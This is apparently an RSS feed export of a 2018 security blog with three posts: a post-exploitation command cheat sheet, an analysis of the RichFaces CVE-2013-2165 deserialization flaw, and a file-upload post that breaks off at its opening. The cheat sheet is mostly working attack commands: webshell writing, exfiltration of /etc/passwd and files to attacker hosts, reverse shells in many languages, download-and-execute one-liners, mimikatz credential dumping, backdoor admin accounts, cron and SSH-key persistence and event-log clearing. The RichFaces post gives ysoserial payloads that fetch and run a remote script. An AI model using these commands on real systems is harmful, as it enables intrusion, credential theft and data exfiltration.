{"@attributes":{"version":"2.0"},"channel":{"title":"whynot","description":"Welcome to my blog~","link":"http:\/\/notwhy.github.io\/","pubDate":"Tue, 27 Nov 2018 04:32:53 +0000","lastBuildDate":"Tue, 27 Nov 2018 04:32:53 +0000","generator":"Jekyll v3.7.4","item":[{"title":"Command Execution Summary","description":"<h1 id=\"0x00-\u524d\u8a00\">0x00 Preface<\/h1>\n<p>Notes on what to do once you have command execution (continuously updated).<\/p>\n<h1 id=\"0x01-\u57fa\u7840\u8be6\u60c5\">0x01 Basics<\/h1>\n<p>To push deeper into a system after command execution, the usual order is: identify the OS, check whether command output is echoed back to you, then check whether the target can reach the internet. In short: OS type -&gt; echo? -&gt; egress?<\/p>\n<h2 id=\"1\u53ef\u56de\u663e\">1. Output is echoed<\/h2>\n<p>Write a webshell (apache, tomcat, nginx and the like will parse a script file directly).<\/p>\n<h3 id=\"window\">Windows<\/h3>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>dir \/s\/a-d\/b d:\\*123456.asp  # find where 123456.asp lives\necho ^&lt;^%eval request^(chr^(35^)^)^%^&gt; &gt; \"d:\\JINHER\\C6\\JHSoft.Web.Login\\images\\LoginTemplate\\whynot.asp\"  # &lt; &gt; % ( ) must be escaped with ^ in cmd, and a file name cannot contain &lt; &gt; : and similar characters\ncopy c:\\Inetpub\\wwwroot\\ckfinder\\userfiles\\files\\images\\cknife.jpg c:\\Inetpub\\wwwroot\\ckfinder\\userfiles\\files\\images\\cknife.aspx  # when one command is blocked, try another\n\nfor \/F %s in ('dir \/s\/a-d\/b c:\\*.aspx') do echo 123 &gt;%s.aspx\n# next to every existing .aspx this creates &lt;name&gt;.aspx.aspx containing 123 (a.aspx -&gt; a.aspx.aspx); crude and noisy, but it also works when nothing is echoed\nfor \/F %s in ('dir \/s\/a-d\/b f:\\*login.css') do echo ^&lt;%@ Page Language=\"Jscript\"%^&gt;^&lt;%eval(Request.Item[\"pass\"],\"unsafe\");%^&gt; &gt;%s.aspx\n<\/code><\/pre><\/div><\/div>\n<h3 id=\"linux\">Linux<\/h3>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>locate, find and the like to locate files\necho PD9waHAgcGhwaW5mbygpOz8+ | base64 -d &gt; 360.php   # PD9waHAgcGhwaW5mbygpOz8+ is the base64 of &lt;?php phpinfo();?&gt;, which sidesteps quoting problems; a Linux file name cannot contain \/ (slash)\n<\/code><\/pre><\/div><\/div>\n<h3 id=\"oobout-of-band-\u65e0\u6cd5\u56de\u663e\u548c\u80fd\u51fa\u7f51\u65f6\u4f7f\u7528\">OOB (out of band): no echo, but the target can reach out<\/h3>\n<p>Windows<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>OOB (out of band) echo, when the target has egress\nfor \/F %s in ('whoami') do start http:\/\/10.10.10.10:8080\/?user=%s   # the output lands in your web server's access log; note that start opens a browser window on the target\nfor \/F %s in ('dir \/b') do start http:\/\/10.10.10.10:81\/?user=%s\n\n# curl\/wget variants (bash syntax; for Linux targets or wherever these tools exist)\ncurl -T {path to file} ftp:\/\/xxx.xxx.xxx.xxx --user {username}:{password}    # push a file to your ftp server\nwget --header=\"EVIL:$(cat \/etc\/passwd)\" http:\/\/xxx.xxx.xxx:xxxx  # needs your own listener on the server side; newlines in a header value break most clients, hence the variant below\n#wget --header=\"evil:`cat \/etc\/passwd | xargs echo -n`\" http:\/\/xxx.xxx.xxx:xxxx\n\nwget --post-data exfil=\"$(cat \/etc\/passwd)\" http:\/\/dnsattacker.com           # extract data in the POST body (with single quotes the literal text, not the file, would be sent)\nwget --post-file trophy.php http:\/\/dnsattacker.com    # extract source code\ncat \/path\/to\/sensitive.txt | curl -F \":data=@-\" http:\/\/dnsattacker.com\/test.txt\n\nVictim\nnc -w 1000 10.10.10.10 1234 &lt; config.php\nAttacker\nnc -l 1234 &gt; config.php\n<\/code><\/pre><\/div><\/div>\n<p>Linux<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>OOB (out of band) echo\n#curl `whoami`.xxxx.xxx     # xxxx.xxx is a domain whose DNS you control; turns a blind command into a visible one\n#curl http:\/\/10.10.10.10:81\/?user=`id`   # output with spaces or parentheses breaks the URL; base64-encode it first\n#wget http:\/\/10.10.10.10:81\/?user=`id`\n#ping %USERNAME%.b182oj.ceye.io   # Windows variant\n#ping -c 3 `ifconfig en0|grep \"inet \"|awk '{print $2}'`.test.xxx.com   # leak the source IP through a DNS lookup (adjust the interface name to the target; not universal)\n<\/code><\/pre><\/div><\/div>\n<p>Some generic ones<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>Needs a domain whose authoritative name server you control\nVictim  # see https:\/\/www.exploit-db.com\/docs\/english\/45370-out-of-band-exploitation-(oob)-cheatsheet.pdf\ncmd \/v \/c \"ipconfig &gt; output &amp;&amp; certutil -encodehex -f output output.hex 4 &amp;&amp; powershell $text=Get-Content output.hex;$subdomain=$text.replace(' ','');$j=11111;foreach($i in $subdomain){$final=$j.tostring()+'.'+$i+'.fzrsuf.3w1.pw';$j += 1; nslookup $final }\"   # every hex line becomes &lt;seq&gt;.&lt;hex&gt;.&lt;your domain&gt; and is resolved; the counter lets the receiver restore the order\nAttacker\nsudo tcpdump -n port 53 | tee file.txt\necho \"0x$(cat file.txt |tr ' ' '\\n' |awk '\/fzrsuf.3w1.pw\/ {print $1}'|sort -u| cut -d '.' -f 2|tr -d '\\n')\" | xxd -r -p   # the awk pattern must be the domain used on the victim; -p is the plain-hex flag (the original had -pr, which xxd does not accept)\n\nVictim\nwget --header=evil:$(ifconfig|xxd -p -c 100000) http:\/\/dnsattacker.com:9000\nAttacker:\necho \"0x$(ncat -lvp 9000 |grep -i evil|tr -d '\/' |cut -d ' ' -f2)\" |xxd -r -p\n<\/code><\/pre><\/div><\/div>\n<p><img src=\"https:\/\/ws2.sinaimg.cn\/large\/006tNbRwly1fv84afj8z6j31aw0kmajx.jpg\" alt=\"\" \/><\/p>\n<h2 id=\"2\u53ef\u51fa\u7f51\">2. Target can reach out<\/h2>\n<p>Reverse shell or drop an implant (to confirm egress, listen with tcpdump -i eth0 icmp on your host, or watch the access log of a web server you control).<\/p>\n<h3 id=\"window--\u4f7f\u7528ping-\u6216\u8005\u4e0b\u9762\u7684download\u6765\u5224\u65ad\u662f\u5426\u80fd\u591f\u51fa\u7f51\">Windows: use ping or the download methods below to test egress<\/h3>\n<p>Reverse shell straight from PowerShell (Server 2003 has no PowerShell by default; Server 2008 ships 2.0)<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>powershell IEX (New-Object Net.WebClient).DownloadString('http:\/\/8.8.8.8\/nishang\/Shells\/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 8.8.8.8 -port 8888 # reverse shell\npowershell -C \"IEX (New-Object System.Net.Webclient).DownloadString('https:\/\/raw.githubusercontent.com\/besimorhino\/powercat\/master\/powercat.ps1');powercat -l -p 8888\"  # listener on your side (powercat as an nc substitute)\n\nhttp:\/\/8.8.8.8\/2.php?id=1;exec master..xp_cmdshell 'powershell IEX(New-Object Net.WebClient).DownloadString(''http:\/\/youvps\/Empire\/data\/module_source\/code_execution\/Invoke-Shellcode.ps1'');Invoke-Shellcode -payload windows\/meterpreter\/reverse_http -lhost 8.8.8.8 -lport 4444 -force';--   # via SQL injection and xp_cmdshell: PowerShell loads a meterpreter stager for msf\n\nIEX (New-Object Net.WebClient).DownloadString('http:\/\/8.8.8.8\/nishang\/Scan\/Invoke-PortScan.ps1');Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254   # port scan\n<\/code><\/pre><\/div><\/div>\n<p>Drop a payload with msf, nc, Cobalt Strike and so on (msf shown)<\/p>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>Generate the payload, upload it, run it\nmsfvenom -p windows\/meterpreter\/reverse_tcp -b '\\x00\\xff' lhost=8.8.8.8 lport=8888 -f dll -o test.dll\nregsvr32 test.dll   # load the dll; DllMain runs even though the dll exports no DllRegisterServer\n\nAttacker listener\nuse exploit\/multi\/handler\nset payload windows\/meterpreter\/reverse_tcp\nset LHOST 8.8.8.8\nset LPORT 8888\nexploit\n\nnc -vv 115.28.206.51 8080 -e c:\\cmd.exe \/\/ connect back to the remote host; without -e it is just a chat channel\nnc -lvvp 8080   \/\/ listener\nnc -nv 8.8.8.8 8080 -e C:\\Windows\\System32\\cmd.exe\nnc -lvp 8080\n<\/code><\/pre><\/div><\/div>\n<p>Add a user directly<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>net user xxx 123!@#qwe \/add     # add a user\nnet localgroup administrators xxx \/add  # put xxx in the local Administrators group\nnet user xxx \/del   # delete the user\n\nfor 03 \/ 08\nREG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" \/v fDenyTSConnections \/t REG_DWORD \/d 00000000 \/f  # enable RDP (3389); tested on 03 and 08\nREG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" \/v fDenyTSConnections \/t REG_DWORD \/d 00000001 \/f  # disable RDP\nREG query \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" \/v PortNumber # show the RDP port (value is hex)\n\n2. Generic way to enable 3389 (cleaner):\nwmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1\n3. For every version:\nEnable 3389 from cmd on win08, win03, win7, win2012, winxp\nwin08, three commands are enough:\nwmic \/namespace:\\\\root\\cimv2\\terminalservices path win32_terminalservicesetting where (__CLASS != \"\") call setallowtsconnections 1\nwmic \/namespace:\\\\root\\cimv2\\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" \/v fSingleSessionPerUser \/t REG_DWORD \/d 0 \/f\nworks on win2012 as well; on win7 the first two suffice. Needs an elevated shell (run as administrator).\n<\/code><\/pre><\/div><\/div>\n<h3 id=\"linux-1\">Linux<\/h3>\n\n<ol>\n  <li>Linux ships perl, python, ruby and so on, so a reverse shell is easy; I prefer bash or perl.<\/li>\n<\/ol>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>Check egress with\n\/usr\/bin\/curl\n\/usr\/bin\/wget\n\/bin\/ping\nIf quoting and escaping through the injection point is a pain, download a script to the box and run it\nwget http:\/\/10.0.0.1\/123344\/back.pl -P \/tmp\/   # drop the directory prefix if the path is a problem\nperl \/tmp\/back.pl\n\ncurl `whoami`.xxxx.xxx     # xxxx.xxx is a domain you control; turns a blind command into a visible one\n\nbash reverse shell\nbash -i &gt;&amp; \/dev\/tcp\/10.0.0.1\/8080 0&gt;&amp;1\n\nas an uploaded bash script (host and port as $1 and $2)\n#!\/bin\/bash\n\/bin\/bash -i &gt;&amp; \/dev\/tcp\/$1\/$2 0&gt;&amp;1\n\nPERL\nperl -e 'use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"&gt;&amp;S\");open(STDOUT,\"&gt;&amp;S\");open(STDERR,\"&gt;&amp;S\");exec(\"\/bin\/sh -i\");};'\n\nPython\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"\/bin\/sh\",\"-i\"]);'\n\nPHP\nphp -r '$sock=fsockopen(\"10.0.0.1\",1234);exec(\"\/bin\/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3\");'   # assumes the socket is fd 3, i.e. the first descriptor php opens\nIf you want a .php file to upload, see the more featureful and robust php-reverse-shell.\n\nRuby\nruby -rsocket -e'f=TCPSocket.open(\"10.0.0.1\",1234).to_i;exec sprintf(\"\/bin\/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d\",f,f,f)'\n\nNetcat\nnc -e \/bin\/sh 10.0.0.1 1234\nwhen this build of nc has no -e\nrm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 10.0.0.1 1234 &gt;\/tmp\/f\n\n\nJava (Groovy syntax)\nr = Runtime.getRuntime()\np = r.exec([\"\/bin\/bash\",\"-c\",\"exec 5&lt;&gt;\/dev\/tcp\/10.0.0.1\/2002;cat &lt;&amp;5 | while read line; do \\$line 2&gt;&amp;5 &gt;&amp;5; done\"] as String[])\np.waitFor()\n\nnode.js\nrequire('child_process').exec('bash -i &gt;&amp; \/dev\/tcp\/8.8.8.8\/80 0&gt;&amp;1');\nnc -lvvp 80\n\nlua\nlua -e \"require('socket');require('os');t=socket.tcp();t:connect('x.x.x.x','5555');os.execute('\/bin\/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3');\"\n<\/code><\/pre><\/div><\/div>\n\n<p>2. Add a Linux user non-interactively<\/p>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>useradd -m test\necho \"123456\" | passwd --stdin test # set the password without a prompt; --stdin exists on RHEL\/CentOS but not on Debian\/Ubuntu (chpasswd works there)\nuserdel -r test     # remove the user and its home directory\n<\/code><\/pre><\/div><\/div>\n<p>3. Write to .ssh\/authorized_keys, or drop a crontab<\/p>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>echo &lt;public key&gt; &gt;&gt; .ssh\/authorized_keys   # append; a single &gt; would clobber the keys already there and get noticed\n\/var\/spool\/cron\/root    # CentOS: root's crontab file\n\/etc\/cron.d\/shell   # Debian: any file dropped into \/etc\/cron.d\/ is run as a cron job\n<\/code><\/pre><\/div><\/div>\n<h2 id=\"3\u5bc6\u7801\u6293\u53d6\">3. Credential dumping<\/h2>\n<h3 id=\"\u901a\u7528-\u6ce8\u610f\u5bc6\u7801\u6293\u53d6\u9700\u8981root\u6743\u9650\">Generic (dumping credentials needs root \/ SYSTEM)<\/h3>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>laz.exe all # grabs wifi, browser (google, facebook logins), database, outlook and OS credentials     # https:\/\/github.com\/AlessandroZ\/LaZagne\n<\/code><\/pre><\/div><\/div>\n<h3 id=\"window-1\">Windows<\/h3>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>Privilege escalation reference    # https:\/\/github.com\/SecWiki\/windows-kernel-exploits\npowershell IEX (New-Object Net.WebClient).DownloadString('http:\/\/8.8.8.8\/123344\/PowerShell\/Invoke-ReflectivePEInjection\/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http:\/\/8.8.8.8\/123344\/ms15-051.exe -ExeArgs \"cmd\" -ForceASLR # run an exe from a URL in memory\nmimikatz    # dump credentials\nmimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\"  # https:\/\/github.com\/gentilkiwi\/mimikatz\npowershell IEX (New-Object Net.WebClient).DownloadString('http:\/\/8.8.8.8\/nishang\/Gather\/Invoke-Mimikatz.ps1');Invoke-Mimikatz  # mimikatz in memory; watch the quoting when this travels through a web parameter\nmimikatz: clear logon and other event logs\nprivilege::debug\nevent::drop\nevent::clear\n<\/code><\/pre><\/div><\/div>\n<h3 id=\"linux-2\">Linux<\/h3>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>.\/mimipenguin   # works on some Ubuntu and Fedora versions https:\/\/github.com\/huntergregal\/mimipenguin\nUseful Linux privilege escalation tools\nhttps:\/\/github.com\/rebootuser\/LinEnum\nhttps:\/\/github.com\/mzet-\/linux-exploit-suggester\nhttps:\/\/github.com\/SecWiki\/linux-kernel-exploits\n<\/code><\/pre><\/div><\/div>\n\n<h2 id=\"4\u4e0b\u8f7d\u6267\u884cdownload-and-exec\">4. Download and execute<\/h2>\n<ul>\n  <li>Windows<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>powershell\npowershell (new-object System.Net.WebClient).DownloadFile('https:\/\/github.com\/3gstudent\/test\/raw\/master\/putty.exe','c:\\download\\a.exe');start-process 'c:\\download\\a.exe'\n\ncertutil    # present on both 03 and 08\ncertutil -urlcache -split -f https:\/\/github.com\/3gstudent\/test\/raw\/master\/putty.exe c:\\download\\a.exe&amp;&amp;c:\\download\\a.exe\ncertutil -urlcache -split -f http:\/\/8.8.8.8:80\/a.txt b.txt\ncertutil -urlcache -split -f http:\/\/8.8.8.8:80\/a a.js &amp;&amp; cscript a.js &amp;&amp;  del a.js &amp;&amp; certutil -urlcache -split -f http:\/\/8.8.8.8:80\/a delete  # run remote js, then purge the certutil cache entry\ncertutil -urlcache -split -f http:\/\/8.8.8.8\/123344\/1.vbs a.vbs &amp;&amp; cscript a.vbs &amp;&amp;  del a.vbs &amp;&amp; certutil -urlcache -split -f http:\/\/8.8.8.8\/123344\/1.vbs delete    # same with vbs\nvbs example    # download and save to c:\\\nSet xPost=createObject(\"Microsoft.XMLHTTP\")\nxPost.Open \"GET\",\"http:\/\/192.168.206.101\/file.zip\",0\nxPost.Send()\nset sGet=createObject(\"ADODB.Stream\")\nsGet.Mode=3\nsGet.Type=1\nsGet.Open()\nsGet.Write xPost.ResponseBody\nsGet.SaveToFile \"c:\\file.zip\",2\n\nbitsadmin: not on Server 2003, present from XP onward   # slow downloads\nbitsadmin \/transfer n http:\/\/lemon.com\/file.zip c:\\1.zip\nbitsadmin \/transfer n http:\/\/8.8.8.8\/mimikatz.exe Z:\/file\/proof\/tmp\/1.exe\nbitsadmin \/transfer n http:\/\/download.sysinternals.com\/files\/PSTools.zip C:\\test\\update\\PSTools.zip\nbitsadmin \/rawreturn \/transfer getfile http:\/\/download.sysinternals.com\/files\/PSTools.zip c:\\p.zip\n\ncscript\ncscript \/b C:\\Windows\\System32\\Printing_Admin_Scripts\\zh-CN\\pubprn.vbs 127.0.0.1 script:https:\/\/gist.githubusercontent.com\/enigma0x3\/64adf8ba99d4485c478b67e03ae6b04a\/raw\/a006a47e4075785016a62f7e5170ef36f5247cdb\/test.sct    # runs a remote scriptlet (pops calc)\n\ntelnet\nserver side: nc -lvp 23 &lt; nc.exe\ndownload side: telnet ip -f c:\\nc.exe\n\nregsvr32\nregsvr32 \/u \/s \/i:https:\/\/raw.githubusercontent.com\/3gstudent\/test\/master\/downloadexec.sct scrobj.dll\n\nrundll32\nrundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication\";o=GetObject(\"script:http:\/\/webserver\/payload.sct\");window.close();\n\n\nmshta\nmshta https:\/\/3gstudent.github.io\/test\/downloadexec2.hta    # requires https:\/\/3gstudent.github.io\/ in IE's Trusted Sites (Internet Options, Security)\n\nwmic and Regasm\/Regsvc\nwmic os get \/format:\"https:\/\/webserver\/payload.xsl\"\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe \/u \\\\webdavserver\\folder\\payload.dll\n\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>Linux<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>The Linux methods are generic and not covered in depth here; see https:\/\/gtfobins.github.io\/\nwget www.baidu.com\/1.rar -P \/tmp\/ # save under \/tmp\ncurl $URL -o $LFILE\nnc\nlua\n<\/code><\/pre><\/div><\/div>\n<p>Related links:<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>https:\/\/github.com\/samratashok\/nishang  # powershell framework\nhttps:\/\/github.com\/EmpireProject\/Empire\nhttps:\/\/github.com\/PowerShellMafia\/PowerSploit\nhttps:\/\/arno0x0x.wordpress.com\/2017\/11\/20\/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code\/\nhttps:\/\/3gstudent.github.io\/3gstudent.github.io\/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E4%BB%8Egithub%E4%B8%8B%E8%BD%BD%E6%96%87%E4%BB%B6%E7%9A%84%E5%A4%9A%E7%A7%8D%E6%96%B9%E6%B3%95\/\nhttps:\/\/gtfobins.github.io\/\nhttp:\/\/reverse-tcp.xyz\/pentest\/red%20team\/2017\/12\/28\/windows-to-download-and-execute-arbitrary-code.html\nhttps:\/\/www.exploit-db.com\/docs\/english\/45370-out-of-band-exploitation-(oob)-cheatsheet.pdf\n<\/code><\/pre><\/div><\/div>\n<p>#\nPlease credit when reposting: <a href=\"https:\/\/notwhy.github.io\/\">whynot<\/a> \u00bb <a href=\"https:\/\/notwhy.gitbooks.io\/2018\/09\/\u547d\u4ee4\u6267\u884c\u603b\u7ed3\/\">web<\/a><\/p>\n\n","pubDate":"Wed, 12 Sep 2018 00:00:00 +0000","link":"http:\/\/notwhy.github.io\/2018\/09\/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%80%BB%E7%BB%93\/","guid":"http:\/\/notwhy.github.io\/2018\/09\/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%80%BB%E7%BB%93\/","category":"web"},{"title":"RichFaces Deserialization Vulnerability: CVE-2013-2165","description":"<h1 id=\"0x00-\u524d\u8a00\">0x00 Preface<\/h1>\n<hr \/>\n<p>\u2003\u2003I had meant to study binary, but Java keeps producing so many vulnerabilities that, as a web security person, I had better learn Java web. I am starting almost from zero, so experts please skip this. I happened to hit a live instance at work, so here is a simple analysis (a thin post stitched together from several sources; the point is to plant a flag and get started).<\/p>\n<h1 id=\"0x01-\u57fa\u7840\u8be6\u60c5\">0x01 
Basics<\/h1>\n<p>Before getting into it, a quick look at the tell-tale signs of Java deserialization.<br \/>\nBlack-box:<\/p>\n<ol>\n  <li>rO0AB   # base64-encoded data in the request that starts with rO0AB (the base64 of the stream magic AC ED 00 05); a ysoserial payload is converted with cat payload.out | base64 -w 0 &gt; payload.out.b64\n<img src=\"https:\/\/ws3.sinaimg.cn\/large\/0069RVTdly1fv4fptk2sdj30pa0bstig.jpg\" alt=\"\" \/><\/li>\n  <li>aced 0005   # the stream magic seen in a hex view of the raw request; in an HTTP body you will also see the letters sr right after it (the TC_OBJECT and TC_CLASSDESC tags, 0x73 0x72)\n<img src=\"https:\/\/ws3.sinaimg.cn\/large\/0069RVTdly1fv4kqos4kcj31au09kn15.jpg\" alt=\"\" \/><\/li>\n  <li>a serialization Content-Type such as application\/x-java-serialized-object says outright that the body is a serialized object\n<img src=\"https:\/\/ws4.sinaimg.cn\/large\/0069RVTdly1fv4k2j9n6bj31ku0fa43h.jpg\" alt=\"\" \/><\/li>\n  <li>org.apache.commons.collections.functors.InvokerTransformer (the Commons Collections gadget class) and a gzip header\n<img src=\"https:\/\/ws2.sinaimg.cn\/large\/006tNbRwly1fvh4aiq4fyj31kw0q9khe.jpg\" alt=\"\" \/>\nWhite-box:<br \/>\nwriteObject serializes an object into a byte stream for storage<br \/>\nreadObject turns the byte stream back into an object; untrusted input reaching it is the sink<\/li>\n<\/ol>\n\n<p>Now the RichFaces arbitrary Java deserialization vulnerability<br \/>\n<img src=\"https:\/\/ws2.sinaimg.cn\/large\/0069RVTdly1furtuu21mkj310003i75q.jpg\" alt=\"\" \/>\nAffected: RichFaces 3.x \u2264 3.3.3 and 4.x \u2264 4.3.2\nFixed in: RichFaces 3.3.4 and 4.3.3<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>RichFaces issues and how they are exploited    # RichFaces has been unmaintained since 2016, so the newer RF-14309 \/ RF-14310 issues should still work against whatever is deployed\nRichFaces 3\n3.1.0 \u2264 3.3.3: CVE-2013-2165\n3.1.0 \u2264 3.3.4: RF-14310\nRichFaces 4\n4.0.0 \u2264 4.3.2: CVE-2013-2165\n4.0.0 \u2264 4.5.4: CVE-2015-0279\n4.5.3 \u2264 4.5.17: RF-14309\n<\/code><\/pre><\/div><\/div>\n<h1 id=\"0x02-\u6f0f\u6d1e\u5206\u6790\">0x02 Analysis<\/h1>\n<p>Local setup: mac + IDEA 2018.01 + Tomcat 7<br \/>\n<a href=\"https:\/\/github.com\/orangetw\/My-CTF-Web-Challenges\/blob\/master\/hitcon-ctf-2016\/angry%20seam\/angryseam.war\">angryseam.war<\/a>  <br \/>\n<a href=\"http:\/\/seamframework.org\/Seam2\/Downloads.html\">related jars<\/a> # import the jars the project needs<br \/>\nFirst a quick look at the advisory \n<img src=\"https:\/\/ws2.sinaimg.cn\/large\/0069RVTdly1furuh6w3xnj31400guage.jpg\" alt=\"\" \/>\nI am on RichFaces 3.x, so the following is about 3.x. When a resource is requested, handling goes through ResourceBuilderImpl.getResourceDataForKey(String). If the resource key begins with \/DATA or \/DATB, the data after it is decrypted by ResourceBuilderImpl.decrypt(byte[]) and then deserialized.\nThis is in getResourceDataForKey in org.ajax4jsf.resource.ResourceBuilderImpl, line 232: the key passed in is decrypted and handed to readObject, and that deserialization is what gives command execution.\n<img src=\"https:\/\/ws2.sinaimg.cn\/large\/0069RVTdly1furv6pwvwxj31kw0qn4di.jpg\" alt=\"\" \/>\nThe RichFaces library handles resource paths starting with a4j by default and strips the version prefix \/a4j\/g\/3_3_3.Finalorg\/<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>\/a4j\/g\/3_3_3.Finalorg\/richfaces\/renderkit\/html\/scripts\/skinning.js\/DATA\/xxxx \n<\/code><\/pre><\/div><\/div>\n<p>The resource is then passed to getResourceDataForKey, which decodes whatever follows DATA.\nTo build a payload we only need to call the encrypt method right below it.\n<img src=\"https:\/\/ws2.sinaimg.cn\/large\/0069RVTdly1furzrgzv3sj31kw0ryqdv.jpg\" alt=\"\" \/>\nThe relevant PoC code:\n<img src=\"https:\/\/ws3.sinaimg.cn\/large\/0069RVTdly1furzt2vofzj31kw0kytkn.jpg\" alt=\"\" \/>\nExploitation:<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>First generate the payload with ysoserial\njava -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar CommonsCollections5 \"wget http:\/\/74.121.151.89\/123344\/back.pl -P \/tmp\/\" &gt; payload.bin\njava -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar CommonsCollections5 \"perl \/tmp\/back.pl\" &gt; p.bin\nThen run hello.java to produce the encrypted payload, and request it\nhttp:\/\/localhost:8011\/seam\/a4j\/g\/3_3_3.Finalorg\/richfaces\/renderkit\/html\/scripts\/skinning.js\/DATA\/your-payload\n<\/code><\/pre><\/div><\/div>\n<h1 id=\"rf-14310-arbitrary-el-evaluation\">RF-14310: Arbitrary EL Evaluation<\/h1>\n<p>Let me publish this first and learn some Java; this part will be filled in later.\nOther references:<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>http:\/\/www.polaris-lab.com\/index.php\/archives\/567\/\nhttps:\/\/foxglovesecurity.com\/2015\/11\/06\/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability\/\nhttps:\/\/github.com\/federicodotta\/Java-Deserialization-Scanner\/releases\nhttp:\/\/vnprogramming.com\/index.php\/2016\/10\/10\/web500-hitconctf-2016-and-exploit-cve-2013-2165\/\nhttps:\/\/codewhitesec.blogspot.com\/2018\/05\/poor-richfaces.html\nhttps:\/\/bl4ck.in\/vulnerability\/analysis\/2018\/03\/28\/Attack-Seam-Framework.html\n<\/code><\/pre><\/div><\/div>\n<p>#\nPlease credit when reposting: <a href=\"https:\/\/notwhy.github.io\/\">whynot<\/a> \u00bb <a href=\"https:\/\/notwhy.gitbooks.io\/\/2018\/08\/RichFaces\u53cd\u5e8f\u5217\u8bdd\u6f0f\u6d1e\u2014\u2014CVE-2013-2165\/\">code-audit<\/a><\/p>\n\n","pubDate":"Thu, 30 Aug 2018 00:00:00 +0000","link":"http:\/\/notwhy.github.io\/2018\/08\/RichFaces%E5%8F%8D%E5%BA%8F%E5%88%97%E8%AF%9D%E6%BC%8F%E6%B4%9E-CVE-2013-2165\/","guid":"http:\/\/notwhy.github.io\/2018\/08\/RichFaces%E5%8F%8D%E5%BA%8F%E5%88%97%E8%AF%9D%E6%BC%8F%E6%B4%9E-CVE-2013-2165\/","category":"java"},{"title":"file-upload","description":"<h1 id=\"0x00-\u524d\u8a00\">0x00 Preface<\/h1>\n<hr \/>\n<p>\u2003\u2003A summary of file upload. If you have not read the <a href=\"https:\/\/xz.aliyun.com\/t\/2435\">Upload-labs walkthrough<\/a>, read that first; this post is a small supplement to it. Cross-origin issues and the like are not covered here; more will be added over time.<\/p>\n\n<h1 id=\"0x01-\u901a\u7528\">0x01 Generic<\/h1>\n<h2 id=\"1-shell\">1. 
